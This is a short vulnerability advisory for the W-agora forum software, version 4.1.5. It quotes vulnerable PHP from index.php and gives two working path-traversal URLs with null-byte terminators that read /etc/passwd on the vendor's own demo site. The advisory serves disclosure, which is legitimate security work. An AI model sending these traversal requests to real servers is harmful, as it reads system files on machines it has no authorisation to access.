======================= ==Shell Security Team== ======================= ============================== ====Advisory For W-agora====== ============================== - Product : w-agora - Tested version : version 4.1.5 - Website : http://www.w-agora.net - Discovery By Sonyy - Vendor Status: informed - Problem : A security vulnerability in W-agora The bug : ========== index.php if (empty($bn)) { # No forum selected -> default to 'site' configuration $site = empty($site) ? "agora" : $site; $cfg_file = "${cfg_dir}/site_${site}.${ext}"; $expnd = "all"; } else { $cfg_file = "${cfg_dir}/${bn}.${ext}"; } Exploit : ========= index.php http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00 And modules.php http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 Any Question : ============== Sonyy --> Sonico60@hotmail.com
